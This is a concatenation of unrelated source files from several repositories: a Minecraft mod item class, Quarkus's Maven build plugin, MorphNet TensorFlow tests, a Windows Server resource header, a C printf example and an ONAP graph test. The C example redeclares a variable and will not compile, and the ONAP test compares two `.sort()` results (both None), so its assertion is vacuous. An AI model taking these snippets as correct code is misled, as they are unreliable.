if(!DragonArtifacts.airWalkSpam) { }else { System.out.println(worked); } itemStack.stackTagCompound.setInteger("lastAirX",newX); itemStack.stackTagCompound.setInteger("lastAirY",newY); itemStack.stackTagCompound.setInteger("lastAirZ",newZ); } } } else { //Clean up left-over blocks. //Only happens when player is holding the artifact, so they will disappear like leaves otherwise. int lastX = itemStack.stackTagCompound.getInteger("lastAirX"); int lastY = itemStack.stackTagCompound.getInteger("lastAirY"); int lastZ = itemStack.stackTagCompound.getInteger("lastAirZ"); if(lastY != -1 && lastY >= 0 && lastY < 256 && world.getBlock(lastX, lastY, lastZ) == BlockSolidAir.instance) { //System.out.println("Player is no longer shifting. Setting x="+lastX+", y="+lastY+", z="+lastZ+" to air."); world.setBlockToAir(lastX, lastY, lastZ); itemStack.stackTagCompound.setInteger("lastAirY",-1); } } } } @Override public void onArmorTickUpdate(World world, EntityPlayer player, ItemStack itemStack, boolean worn) { if(worn) onHeld(itemStack, world, player, 0, true); } @Override public String getPreAdj(Random rand) { String str = ""; switch(rand.nextInt(2)) { case 0: str = "Floating"; break; case 1: str = "Light"; break; } return str; } @Override public String getPostAdj(Random rand) { String str = ""; switch(rand.nextInt(2)) { case 0: str = "of Hermes"; break; case 1: str = "of Flight"; break; } return str; } @Override public int getTextureBitflags() { return Flags.AMULET | Flags.RING | Flags.STAFF | Flags.TRINKET | Flags.WAND | Flags.ARMOR | Flags.BOOTS; } @Override public int getNegTextureBitflags() { return Flags.DAGGER | Flags.SWORD | Flags.FIGURINE | Flags.HELM | Flags.BELT; } }
PieterjanDeconinck/quarkus
devtools/maven/src/main/java/io/quarkus/maven/BuildMojo.java
<filename>devtools/maven/src/main/java/io/quarkus/maven/BuildMojo.java package io.quarkus.maven; import java.io.File; import java.util.List; import java.util.Properties; import org.apache.maven.artifact.Artifact; import org.apache.maven.plugin.AbstractMojo; import org.apache.maven.plugin.MojoExecutionException; import org.apache.maven.plugins.annotations.Component; import org.apache.maven.plugins.annotations.LifecyclePhase; import org.apache.maven.plugins.annotations.Mojo; import org.apache.maven.plugins.annotations.Parameter; import org.apache.maven.plugins.annotations.ResolutionScope; import org.apache.maven.project.MavenProject; import org.apache.maven.project.MavenProjectHelper; import org.eclipse.aether.RepositorySystem; import org.eclipse.aether.RepositorySystemSession; import org.eclipse.aether.repository.RemoteRepository; import io.quarkus.bootstrap.app.AugmentAction; import io.quarkus.bootstrap.app.AugmentResult; import io.quarkus.bootstrap.app.CuratedApplication; import io.quarkus.bootstrap.app.QuarkusBootstrap; import io.quarkus.bootstrap.model.AppArtifact; import io.quarkus.bootstrap.resolver.maven.MavenArtifactResolver; /** * Build the application. * <p> * You can build a native application runner with {@code native-image} * * @author <NAME> */ @Mojo(name = "build", defaultPhase = LifecyclePhase.PACKAGE, requiresDependencyResolution = ResolutionScope.COMPILE_PLUS_RUNTIME, threadSafe = true) public class BuildMojo extends AbstractMojo { protected static final String QUARKUS_PACKAGE_UBER_JAR = "quarkus.package.uber-jar"; /** * The entry point to Aether, i.e. the component doing all the work. * * @component */ @Component private RepositorySystem repoSystem; @Component private MavenProjectHelper projectHelper; /** * The current repository/network configuration of Maven. * * @parameter default-value="${repositorySystemSession}" * @readonly */ @Parameter(defaultValue = "${repositorySystemSession}", readonly = true) private RepositorySystemSession repoSession; /** * The project's remote repositories to use for the resolution of artifacts and their dependencies. * * @parameter default-value="${project.remoteProjectRepositories}" * @readonly */ @Parameter(defaultValue = "${project.remoteProjectRepositories}", readonly = true, required = true) private List<RemoteRepository> repos; /** * The project's remote repositories to use for the resolution of plugins and their dependencies. * * @parameter default-value="${project.remotePluginRepositories}" * @readonly */ @Parameter(defaultValue = "${project.remotePluginRepositories}", readonly = true, required = true) private List<RemoteRepository> pluginRepos; /** * The directory for compiled classes. */ @Parameter(readonly = true, required = true, defaultValue = "${project.build.outputDirectory}") private File outputDirectory; @Parameter(defaultValue = "${project}", readonly = true, required = true) protected MavenProject project; /** * The directory for generated source files. */ @Parameter(defaultValue = "${project.build.directory}/generated-sources") private File generatedSourcesDirectory; @Parameter(defaultValue = "${project.build.directory}") private File buildDir; @Parameter(defaultValue = "${project.build.finalName}") private String finalName; @Parameter(property = "uberJar", defaultValue = "false") private boolean uberJar; /** * When using the uberJar option, this array specifies entries that should * be excluded from the final jar. The entries are relative to the root of * the file. An example of this configuration could be: * <code><pre> * &#x3C;configuration&#x3E; * &#x3C;uberJar&#x3E;true&#x3C;/uberJar&#x3E; * &#x3C;ignoredEntries&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC2048KE.SF&#x3C;/ignoredEntry&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC2048KE.DSA&#x3C;/ignoredEntry&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC1024KE.SF&#x3C;/ignoredEntry&#x3E; * &#x3C;ignoredEntry&#x3E;META-INF/BC1024KE.DSA&#x3C;/ignoredEntry&#x3E; * &#x3C;/ignoredEntries&#x3E; * &#x3C;/configuration&#x3E; * </pre></code> */ @Parameter(property = "ignoredEntries") private String[] ignoredEntries; /** Skip the execution of this mojo */ @Parameter(defaultValue = "false", property = "quarkus.build.skip") private boolean skip = false; public BuildMojo() { MojoLogger.logSupplier = this::getLog; } @Override public void execute() throws MojoExecutionException { if (project.getPackaging().equals("pom")) { getLog().info("Type of the artifact is POM, skipping build goal"); return; } if (skip) { getLog().info("Skipping Quarkus build"); return; } boolean clear = false; try { final Properties projectProperties = project.getProperties(); final Properties realProperties = new Properties(); for (String name : projectProperties.stringPropertyNames()) { if (name.startsWith("quarkus.")) { realProperties.setProperty(name, projectProperties.getProperty(name)); } } if (uberJar && System.getProperty(QUARKUS_PACKAGE_UBER_JAR) == null) { System.setProperty(QUARKUS_PACKAGE_UBER_JAR, "true"); clear = true; } realProperties.putIfAbsent("quarkus.application.name", project.getArtifactId()); realProperties.putIfAbsent("quarkus.application.version", project.getVersion()); MavenArtifactResolver resolver = MavenArtifactResolver.builder() .setRepositorySystem(repoSystem) .setRepositorySystemSession(repoSession) .setRemoteRepositories(repos) .build(); final Artifact projectArtifact = project.getArtifact(); final AppArtifact appArtifact = new AppArtifact(projectArtifact.getGroupId(), projectArtifact.getArtifactId(), projectArtifact.getClassifier(), projectArtifact.getArtifactHandler().getExtension(), projectArtifact.getVersion()); CuratedApplication curatedApplication = QuarkusBootstrap.builder(outputDirectory.toPath()) .setAppArtifact(appArtifact) .setProjectRoot(project.getBasedir().toPath()) .setMavenArtifactResolver(resolver) .setBaseClassLoader(BuildMojo.class.getClassLoader()) .setBuildSystemProperties(realProperties) .setLocalProjectDiscovery(false) .setBaseName(finalName) .setTargetDirectory(buildDir.toPath()) .build().bootstrap(); AugmentAction action = curatedApplication.createAugmentor(); AugmentResult result = action.createProductionApplication(); Artifact original = project.getArtifact(); if (result.getJar() != null) { if (result.getJar().isUberJar() && result.getJar().getOriginalArtifact() != null) { original.setFile(result.getJar().getOriginalArtifact().toFile()); } if (result.getJar().isUberJar()) { projectHelper.attachArtifact(project, result.getJar().getPath().toFile(), "runner"); } } } catch (Exception e) { throw new MojoExecutionException("Failed to build quarkus application", e); } finally { if (clear) { System.clearProperty(QUARKUS_PACKAGE_UBER_JAR); } } } }
zcdzcdzcd/models
research/morph_net/network_regularizers/flop_regularizer_test.py
<gh_stars>10-100 # Copyright 2018 The TensorFlow Authors All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for flop_regularizer.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc import numpy as np import tensorflow as tf from tensorflow.contrib.slim.nets import resnet_v1 from morph_net.network_regularizers import bilinear_cost_utils from morph_net.network_regularizers import flop_regularizer arg_scope = tf.contrib.framework.arg_scope layers = tf.contrib.layers _coeff = bilinear_cost_utils.flop_coeff NUM_CHANNELS = 3 class GammaFlopLossTest(tf.test.TestCase): def setUp(self): tf.reset_default_graph() self.BuildWithBatchNorm() with self.test_session(): self.Init() def BuildWithBatchNorm(self): params = { 'trainable': True, 'normalizer_fn': layers.batch_norm, 'normalizer_params': { 'scale': True } } with arg_scope([layers.conv2d], **params): self.BuildModel() def BuildModel(self): # Our test model is: # # -> conv1 --+ -> conv3 --> # / | / # image [concat] # \ | \ # -> conv2 --+ -> conv4 --> # # (the model has two "outputs", conv3 and conv4). # image = tf.constant(0.0, shape=[1, 17, 19, NUM_CHANNELS]) conv1 = layers.conv2d(image, 13, [7, 5], padding='SAME', scope='conv1') conv2 = layers.conv2d(image, 23, [1, 1], padding='SAME', scope='conv2') concat = tf.concat([conv1, conv2], 3) self.conv3 = layers.conv2d( concat, 29, [3, 3], stride=2, padding='SAME', scope='conv3') self.conv4 = layers.conv2d( concat, 31, [1, 1], stride=1, padding='SAME', scope='conv4') self.name_to_var = {v.op.name: v for v in tf.global_variables()} self.gamma_flop_reg = flop_regularizer.GammaFlopsRegularizer( [self.conv3.op, self.conv4.op], gamma_threshold=0.45) def GetConv(self, name): return tf.get_default_graph().get_operation_by_name(name + '/Conv2D') def Init(self): tf.global_variables_initializer().run() gamma1 = self.name_to_var['conv1/BatchNorm/gamma'] gamma1.assign([0.8] * 7 + [0.2] * 6).eval() gamma2 = self.name_to_var['conv2/BatchNorm/gamma'] gamma2.assign([-0.7] * 11 + [0.1] * 12).eval() gamma3 = self.name_to_var['conv3/BatchNorm/gamma'] gamma3.assign([0.6] * 10 + [-0.3] * 19).eval() gamma4 = self.name_to_var['conv4/BatchNorm/gamma'] gamma4.assign([-0.5] * 17 + [-0.4] * 14).eval() def cost(self, conv): with self.test_session(): return self.gamma_flop_reg.get_cost(conv).eval() def loss(self, conv): with self.test_session(): return self.gamma_flop_reg.get_regularization_term(conv).eval() def testCost(self): # Conv1 has 7 gammas above 0.45, and NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv1') self.assertEqual(_coeff(conv) * 7 * NUM_CHANNELS, self.cost([conv])) # Conv2 has 11 gammas above 0.45, and NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv2') self.assertEqual(_coeff(conv) * 11 * NUM_CHANNELS, self.cost([conv])) # Conv3 has 10 gammas above 0.45, and 7 + 11 inputs from conv1 and conv2. conv = self.GetConv('conv3') self.assertEqual(_coeff(conv) * 10 * 18, self.cost([conv])) # Conv4 has 17 gammas above 0.45, and 7 + 11 inputs from conv1 and conv2. conv = self.GetConv('conv4') self.assertEqual(_coeff(conv) * 17 * 18, self.cost([conv])) # Test that passing a list of convs sums their contributions: convs = [self.GetConv('conv3'), self.GetConv('conv4')] self.assertEqual( self.cost(convs[:1]) + self.cost(convs[1:]), self.cost(convs)) class GammaFlopLossWithDepthwiseConvTestBase(object): """Test flop_regularizer for a network with depthwise convolutions.""" __metaclass__ = abc.ABCMeta @abc.abstractmethod def GetSession(self): return def BuildWithBatchNorm(self): params = { 'trainable': True, 'normalizer_fn': layers.batch_norm, 'normalizer_params': { 'scale': True } } ops_with_batchnorm = [layers.conv2d] if self._depthwise_use_batchnorm: ops_with_batchnorm.append(layers.separable_conv2d) with arg_scope(ops_with_batchnorm, **params): self.BuildModel() def BuildModel(self): # Our test model is: # # -> dw1 --> conv1 --+ # / | # image [concat] --> conv3 # \ | # -> conv2 --> dw2 --+ # # (the model has one "output", conv3). # image = tf.constant(0.0, shape=[1, 17, 19, NUM_CHANNELS]) dw1 = layers.separable_conv2d( image, None, [3, 3], depth_multiplier=1, stride=1, scope='dw1') conv1 = layers.conv2d(dw1, 13, [7, 5], padding='SAME', scope='conv1') conv2 = layers.conv2d(image, 23, [1, 1], padding='SAME', scope='conv2') dw2 = layers.separable_conv2d( conv2, None, [5, 5], depth_multiplier=1, stride=1, scope='dw2') concat = tf.concat([conv1, dw2], 3) self.conv3 = layers.conv2d( concat, 29, [3, 3], stride=2, padding='SAME', scope='conv3') self.name_to_var = {v.op.name: v for v in tf.global_variables()} self.gamma_flop_reg = flop_regularizer.GammaFlopsRegularizer( [self.conv3.op], gamma_threshold=0.45) def GetConv(self, name): return tf.get_default_graph().get_operation_by_name( name + ('/Conv2D' if 'conv' in name else '/depthwise')) def GetGammaAbsValue(self, name): gamma_op = tf.get_default_graph().get_operation_by_name(name + '/BatchNorm/gamma') with self.GetSession(): # pylint: disable=not-context-manager gamma = gamma_op.outputs[0].eval() return np.abs(gamma) def Init(self): tf.global_variables_initializer().run() gamma1 = self.name_to_var['conv1/BatchNorm/gamma'] gamma1.assign([0.8] * 7 + [0.2] * 6).eval() gamma2 = self.name_to_var['conv2/BatchNorm/gamma'] gamma2.assign([-0.7] * 11 + [0.1] * 12).eval() gamma3 = self.name_to_var['conv3/BatchNorm/gamma'] gamma3.assign([0.6] * 10 + [-0.3] * 19).eval() # Initialize gamma for depthwise convs only if there are Batchnorm for them. if self._depthwise_use_batchnorm: gammad1 = self.name_to_var['dw1/BatchNorm/gamma'] gammad1.assign([-0.3] * 1 + [-0.9] * 2).eval() gammad2 = self.name_to_var['dw2/BatchNorm/gamma'] gammad2.assign([0.3] * 5 + [0.9] * 10 + [-0.1] * 8).eval() def cost(self, conv): # pylint: disable=invalid-name with self.GetSession(): # pylint: disable=not-context-manager cost = self.gamma_flop_reg.get_cost(conv) return cost.eval() if isinstance(cost, tf.Tensor) else cost def loss(self, conv): # pylint: disable=invalid-name with self.GetSession(): # pylint: disable=not-context-manager reg = self.gamma_flop_reg.get_regularization_term(conv) return reg.eval() if isinstance(reg, tf.Tensor) else reg class GammaFlopLossWithDepthwiseConvTest( tf.test.TestCase, GammaFlopLossWithDepthwiseConvTestBase): """Test flop_regularizer for a network with depthwise convolutions.""" def setUp(self): self._depthwise_use_batchnorm = True tf.reset_default_graph() self.BuildWithBatchNorm() with self.test_session(): self.Init() def GetSession(self): return self.test_session() def testCost(self): # Dw1 has 2 gammas above 0.45 out of NUM_CHANNELS inputs (from the image), # but because the input doesn't have a regularizer, it has no way of # removing the channels, so the channel count is still NUM_CHANNELS. conv = self.GetConv('dw1') self.assertEqual(_coeff(conv) * NUM_CHANNELS, self.cost([conv])) # Conv1 has 7 gammas above 0.45, and NUM_CHANNELS inputs (from dw1). conv = self.GetConv('conv1') self.assertEqual(_coeff(conv) * 7 * NUM_CHANNELS, self.cost([conv])) # Conv2 has 11 active + 12 inactive, while Dw2 has 5 inactive, 10 active and # 8 active. Their max (or) has 15 active and 8 inactive. # Conv2 has NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv2') self.assertEqual(_coeff(conv) * 15 * NUM_CHANNELS, self.cost([conv])) # Dw2 has 15 out of 23 inputs (from the Conv2). conv = self.GetConv('dw2') self.assertEqual(_coeff(conv) * 15, self.cost([conv])) # Conv3 has 10 gammas above 0.45, and 7 + 15 inputs from conv1 and dw2. conv = self.GetConv('conv3') self.assertEqual(_coeff(conv) * 10 * 22, self.cost([conv])) def testRegularizer(self): # Dw1 depthwise convolution is connected to the input (no regularizer). conv = self.GetConv('dw1') # Although the effective regularizer for dw is computed as below: # gamma = self.GetGammaAbsValue('dw1') # expected_loss = _coeff(conv) * gamma.sum() # Since the input is not regularized, dw does not return a regularizer. expected_loss = 0.0 self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Conv1 takes Dw1 as input, its input regularizer is from dw1. conv = self.GetConv('conv1') gamma = self.GetGammaAbsValue('conv1') # The effective size for dw can be computed from its gamma, and # the loss may be computed as follows: # gamma_dw = self.GetGammaAbsValue('dw1') # expected_loss = _coeff(conv) * ( # gamma.sum() * (gamma_dw > 0.45).sum() + gamma_dw.sum() * # (gamma > 0.45).sum()) # However, since dw cannot change shape because its input doesn't have a # regularizer, the real loss we expect should be: expected_loss = _coeff(conv) * (gamma.sum() * NUM_CHANNELS) self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Dw2 depthwise convolution is connected to conv2 (grouped regularizer). conv = self.GetConv('conv2') gamma_conv = self.GetGammaAbsValue('conv2') dw = self.GetConv('dw2') gamma_dw = self.GetGammaAbsValue('dw2') gamma = np.maximum(gamma_dw, gamma_conv).sum() expected_loss = _coeff(conv) * (gamma * 3 + (gamma > 0.45).sum() * 0) self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) expected_loss = _coeff(dw) * gamma * 2 self.assertNear(expected_loss, self.loss([dw]), expected_loss * 1e-5) class GammaFlopLossWithDepthwiseConvNoBatchNormTest( tf.test.TestCase, GammaFlopLossWithDepthwiseConvTestBase): """Test flop_regularizer for un-batchnormed depthwise convolutions. This test is used to confirm that when depthwise convolution is not BNed, it will not be considered towards the regularizer, but it will be counted towards the cost. This design choice is for backward compatibility for users who did not regularize depthwise convolutions. However, the cost will be reported regardless in order to be faithful to the real computation complexity. """ def setUp(self): self._depthwise_use_batchnorm = False tf.reset_default_graph() self.BuildWithBatchNorm() with self.test_session(): self.Init() def GetSession(self): return self.test_session() def testCost(self): # Dw1 has NUM_CHANNELS inputs (from the image). conv = self.GetConv('dw1') self.assertEqual(_coeff(conv) * 3, self.cost([conv])) # Conv1 has 7 gammas above 0.45, and 3 inputs (from dw1). conv = self.GetConv('conv1') self.assertEqual(_coeff(conv) * 7 * 3, self.cost([conv])) # Conv2 has 11 active outputs and NUM_CHANNELS inputs (from the image). conv = self.GetConv('conv2') self.assertEqual(_coeff(conv) * 11 * NUM_CHANNELS, self.cost([conv])) # Dw2 has 11 inputs (pass-through from the Conv2). conv = self.GetConv('dw2') self.assertEqual(_coeff(conv) * 11, self.cost([conv])) # Conv3 has 10 gammas above 0.45, and 7 + 11 inputs from conv1 and dw2. conv = self.GetConv('conv3') self.assertEqual(_coeff(conv) * 10 * 18, self.cost([conv])) def testRegularizer(self): # Dw1 depthwise convolution is connected to the input (no regularizer). conv = self.GetConv('dw1') expected_loss = 0.0 self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Conv1 takes Dw1 as input, but it's not affected by dw1 because depthwise # is not BNed. conv = self.GetConv('conv1') gamma = self.GetGammaAbsValue('conv1') expected_loss = _coeff(conv) * (gamma.sum() * NUM_CHANNELS) self.assertNear(expected_loss, self.loss([conv]), expected_loss * 1e-5) # Dw2 depthwise convolution is connected to conv2 (pass through). dw = self.GetConv('dw2') gamma = self.GetGammaAbsValue('conv2') expected_loss = _coeff(dw) * gamma.sum() * 2 self.assertNear(expected_loss, self.loss([dw]), expected_loss * 1e-5) class GammaFlopResidualConnectionsLossTest(tf.test.TestCase): """Tests flop_regularizer for a network with residual connections.""" def setUp(self): tf.reset_default_graph() tf.set_random_seed(7) self._threshold = 0.6 def buildModel(self, resnet_fn, block_fn): # We use this model as a test case because the slim.nets.resnet module is # used in some production. # # The model looks as follows: # # Image --> unit_1/shortcut # Image --> unit_1/conv1 --> unit_1/conv2 --> unit_1/conv3 # # unit_1/shortcut + unit_1/conv3 --> unit_1 (residual connection) # # unit_1 --> unit_2/conv1 -> unit_2/conv2 --> unit_2/conv3 # # unit_1 + unit_2/conv3 --> unit_2 (residual connection) # # In between, there are strided convolutions and pooling ops, but these # should not affect the regularizer. blocks = [ block_fn('block1', base_depth=7, num_units=2, stride=2), ] image = tf.constant(0.0, shape=[1, 2, 2, NUM_CHANNELS]) net = resnet_fn( image, blocks, include_root_block=False, is_training=False)[0] net = tf.reduce_mean(net, axis=(1, 2)) return layers.fully_connected(net, 23, scope='FC') def buildGraphWithBatchNorm(self, resnet_fn, block_fn): params = { 'trainable': True, 'normalizer_fn': layers.batch_norm, 'normalizer_params': { 'scale': True } } with arg_scope([layers.conv2d, layers.separable_conv2d], **params): self.net = self.buildModel(resnet_fn, block_fn) def initGamma(self): assignments = [] gammas = {} for v in tf.global_variables(): if v.op.name.endswith('/gamma'): assignments.append(v.assign(tf.random_uniform(v.shape))) gammas[v.op.name] = v with self.test_session() as s: s.run(assignments) self._gammas = s.run(gammas) def getGamma(self, short_name): tokens = short_name.split('/') name = ('resnet_v1/block1/' + tokens[0] + '/bottleneck_v1/' + tokens[1] + '/BatchNorm/gamma') return self._gammas[name] def getOp(self, short_name): if short_name == 'FC': return tf.get_default_graph().get_operation_by_name('FC/MatMul') tokens = short_name.split('/') name = ('resnet_v1/block1/' + tokens[0] + '/bottleneck_v1/' + tokens[1] + '/Conv2D') return tf.get_default_graph().get_operation_by_name(name) def numAlive(self, short_name): return np.sum(self.getGamma(short_name) > self._threshold) def getCoeff(self, short_name): return _coeff(self.getOp(short_name)) def testCost(self): self.buildGraphWithBatchNorm(resnet_v1.resnet_v1, resnet_v1.resnet_v1_block) self.initGamma() res_alive = np.logical_or( np.logical_or( self.getGamma('unit_1/shortcut') > self._threshold, self.getGamma('unit_1/conv3') > self._threshold), self.getGamma('unit_2/conv3') > self._threshold) self.gamma_flop_reg = flop_regularizer.GammaFlopsRegularizer( [self.net.op], self._threshold) expected = {} expected['unit_1/shortcut'] = ( self.getCoeff('unit_1/shortcut') * np.sum(res_alive) * NUM_CHANNELS) expected['unit_1/conv1'] = ( self.getCoeff('unit_1/conv1') * self.numAlive('unit_1/conv1') * NUM_CHANNELS) expected['unit_1/conv2'] = ( self.getCoeff('unit_1/conv2') * self.numAlive('unit_1/conv2') * self.numAlive('unit_1/conv1')) expected['unit_1/conv3'] = ( self.getCoeff('unit_1/conv3') * np.sum(res_alive) * self.numAlive('unit_1/conv2')) expected['unit_2/conv1'] = ( self.getCoeff('unit_2/conv1') * self.numAlive('unit_2/conv1') * np.sum(res_alive)) expected['unit_2/conv2'] = ( self.getCoeff('unit_2/conv2') * self.numAlive('unit_2/conv2') * self.numAlive('unit_2/conv1')) expected['unit_2/conv3'] = ( self.getCoeff('unit_2/conv3') * np.sum(res_alive) * self.numAlive('unit_2/conv2')) expected['FC'] = 2.0 * np.sum(res_alive) * 23.0 # TODO: Is there a way to use Parametrized Tests to make this more # elegant? with self.test_session(): for short_name in expected: cost = self.gamma_flop_reg.get_cost([self.getOp(short_name)]).eval() self.assertEqual(expected[short_name], cost) self.assertEqual( sum(expected.values()), self.gamma_flop_reg.get_cost().eval()) class GroupLassoFlopRegTest(tf.test.TestCase): def assertNearRelatively(self, expected, actual): self.assertNear(expected, actual, expected * 1e-6) def testFlopRegularizer(self): tf.reset_default_graph() tf.set_random_seed(7907) with arg_scope( [layers.conv2d, layers.conv2d_transpose], weights_initializer=tf.random_normal_initializer): # Our test model is: # # -> conv1 --+ # / |--[concat] # image --> conv2 --+ # \ # -> convt # # (the model has two "outputs", convt and concat). # image = tf.constant(0.0, shape=[1, 17, 19, NUM_CHANNELS]) conv1 = layers.conv2d( image, 13, [7, 5], padding='SAME', scope='conv1') conv2 = layers.conv2d( image, 23, [1, 1], padding='SAME', scope='conv2') self.concat = tf.concat([conv1, conv2], 3) self.convt = layers.conv2d_transpose( image, 29, [7, 5], stride=3, padding='SAME', scope='convt') self.name_to_var = {v.op.name: v for v in tf.global_variables()} with self.test_session(): tf.global_variables_initializer().run() threshold = 1.0 flop_reg = flop_regularizer.GroupLassoFlopsRegularizer( [self.concat.op, self.convt.op], threshold=threshold) with self.test_session() as s: evaluated_vars = s.run(self.name_to_var) def group_norm(weights, axis=(0, 1, 2)): # pylint: disable=invalid-name return np.sqrt(np.mean(weights**2, axis=axis)) reg_vectors = { 'conv1': group_norm(evaluated_vars['conv1/weights'], (0, 1, 2)), 'conv2': group_norm(evaluated_vars['conv2/weights'], (0, 1, 2)), 'convt': group_norm(evaluated_vars['convt/weights'], (0, 1, 3)) } num_alive = {k: np.sum(r > threshold) for k, r in reg_vectors.iteritems()} total_outputs = ( reg_vectors['conv1'].shape[0] + reg_vectors['conv2'].shape[0]) total_alive_outputs = sum(num_alive.values()) assert total_alive_outputs > 0, ( 'All outputs are dead - test is trivial. Decrease the threshold.') assert total_alive_outputs < total_outputs, ( 'All outputs are alive - test is trivial. Increase the threshold.') coeff1 = _coeff(_get_op('conv1/Conv2D')) coeff2 = _coeff(_get_op('conv2/Conv2D')) coefft = _coeff(_get_op('convt/conv2d_transpose')) expected_flop_cost = NUM_CHANNELS * ( coeff1 * num_alive['conv1'] + coeff2 * num_alive['conv2'] + coefft * num_alive['convt']) expected_reg_term = NUM_CHANNELS * ( coeff1 * np.sum(reg_vectors['conv1']) + coeff2 * np.sum( reg_vectors['conv2']) + coefft * np.sum(reg_vectors['convt'])) with self.test_session(): self.assertEqual( round(expected_flop_cost), round(flop_reg.get_cost().eval())) self.assertNearRelatively(expected_reg_term, flop_reg.get_regularization_term().eval()) def _get_op(name): # pylint: disable=invalid-name return tf.get_default_graph().get_operation_by_name(name) if __name__ == '__main__': tf.test.main()
npocmaka/Windows-Server-2003
ds/security/ssr/te/resource.h
<gh_stars>10-100 //{{NO_DEPENDENCIES}} // Microsoft Developer Studio generated include file. // Used by SSRTE.rc // #define IDS_PROJNAME 100 #define IDR_SSRTENGINE 101 #define IDS_TRANSFORM_SUCCEEDED 101 #define IDS_TRANSFORM_FAILED 102 #define IDS_FILEWRITE_FAILED 103 #define IDR_FEEDBACK 104 #define IDS_FILEREAD_FAILED 104 #define IDS_FILECREATE_FAILED 105 #define IDS_FILECREATE_SUCCEEDED 106 #define IDS_DOM_PROPERTY_PUT_FAILED 107 #define IDS_DOM_LOAD_FAILED 108 #define IDS_NOT_SUPPORTED_SCRIPT_FILE_TYPE 109 #define IDS_EXIT_CODE 110 #define IDS_ERROR_CREATE_PROCESS 111 #define IDS_EXECUTE_SCRIPT 112 #define IDS_RUNSCRIPTS 113 #define IDS_LOAD_MEM_ACTION_DATA 114 #define IDS_DO_ACTION_VERB 115 #define IDS_NO_CUSTOM_MEMBER_OBJ 116 #define IDS_MISSING_CUSTOM_MEMBER 117 #define IDS_NO_SCRIPT_FILES 118 #define IDS_TRANSFORM 119 #define IDS_LAUNCH_SCRIPTS 120 #define IDS_DO_CUSTOM 121 #define IDS_NO_ACTION 122 #define IDS_CANNOT_ACCESS_FILE 123 #define IDS_FAIL_MOVE_FILE 124 #define IDS_FAIL_CREATE_DIRECTORY 125 #define IDS_LOAD_SECPOLICY 126 #define IDS_REG_TYPE_NOT_SUPPORTED 127 #define IDS_TOTAL_STEPS 128 #define IDS_START_CLEANUP_CONFIGURE_OUTPUTS 129 #define IDS_END_CLEANUP_CONFIGURE_OUTPUTS 130 #define IDS_START_BACKUP_ROLLBACK_OUTPUTS 131 #define IDS_END_BACKUP_ROLLBACK_OUTPUTS 132 #define IDS_NO_SCRIPTS_TO_RUN 133 #define IDS_RUNNING_SCRIPTS 134 #define IDS_INVALID_PARAMETER 135 #define IDS_CREATE_IXSLPROC_FAILED 136 #define IDS_XSL_TRANSFORM_FAILED 137 #define IDS_SSR_START_ACTION_TRANSFORM 138 #define IDS_SSR_START_ACTION_APPLY 139 #define IDS_START_CUSTOM 140 #define IDS_START_XSL_TRANSFORM 141 #define IDS_START_SCRIPTS 142 #define IDS_END_CUSTOM 143 #define IDS_END_XSL_TRANSFORM 144 #define IDS_END_SCRIPTS 145 #define IDS_SSR_END_ACTION_TRANSFORM 146 #define IDS_SSR_END_ACTION_APPLY 147 #define IDS_MISSING_SECPOLICY 148 #define IDS_SECPOLICY_INVALID_TYPE 149 #define IDS_FAIL_CREATE_XSLT 150 #define IDS_XML_PARSING_ERROR 151 #define IDS_OBJECT_NOT_FOUND 152 #define IDS_MISSING_MEMBER 153 #define IDS_MEMBER_NOT_SUPPORT_ACTION 154 #define IDS_MISSING_PROGID 155 #define IDS_XML_LOADING_MEMBER 156 #define IDS_XML_LOADING_PROCEDURE 157 // Next default values for new objects // #ifdef APSTUDIO_INVOKED #ifndef APSTUDIO_READONLY_SYMBOLS #define _APS_NEXT_RESOURCE_VALUE 201 #define _APS_NEXT_COMMAND_VALUE 32768 #define _APS_NEXT_CONTROL_VALUE 201 #define _APS_NEXT_SYMED_VALUE 128 #endif #endif
CrazyJ36/c
c/odd-long-numbers.c
<gh_stars>0 /* This shows why some long types need to be formatted properly. */ #include <stdio.h> int main() { // short int, unsigned short int - h short int i = 3; printf( "%hd", i ); // long int or unsigned long int - l long int i = 3; printf( "%ld", i ); // wide characters or strings - l wchar_t* wide_str = L"Wide String"; printf( "%ls", wide_str ); // long double - L long double d = 3.1415926535; printf( "%Lg", d ); printf("\n"); return 0; }
onap/vfc-nfvo-lcm
lcm/workflows/graphflow/tests/graph_tests.py
# Copyright 2018 ZTE Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from django.test import TestCase from lcm.workflows.graphflow.flow.graph import Graph logger = logging.getLogger(__name__) class TestToscaparser(TestCase): def setUp(self): pass def tearDown(self): pass def test_graph(self): data = { "cucp": [], "du": [], "vl_flat_net": ["cucp", "cuup"], "vl_ext_net": ["cucp", "cuup"], "cuup": [] } graph = Graph(data) self.assertEqual(['vl_ext_net', 'vl_flat_net'].sort(), graph.get_pre_nodes("cucp").sort())
Acidburn0zzz/ComputeLibrary
documentation/navtreeindex8.js
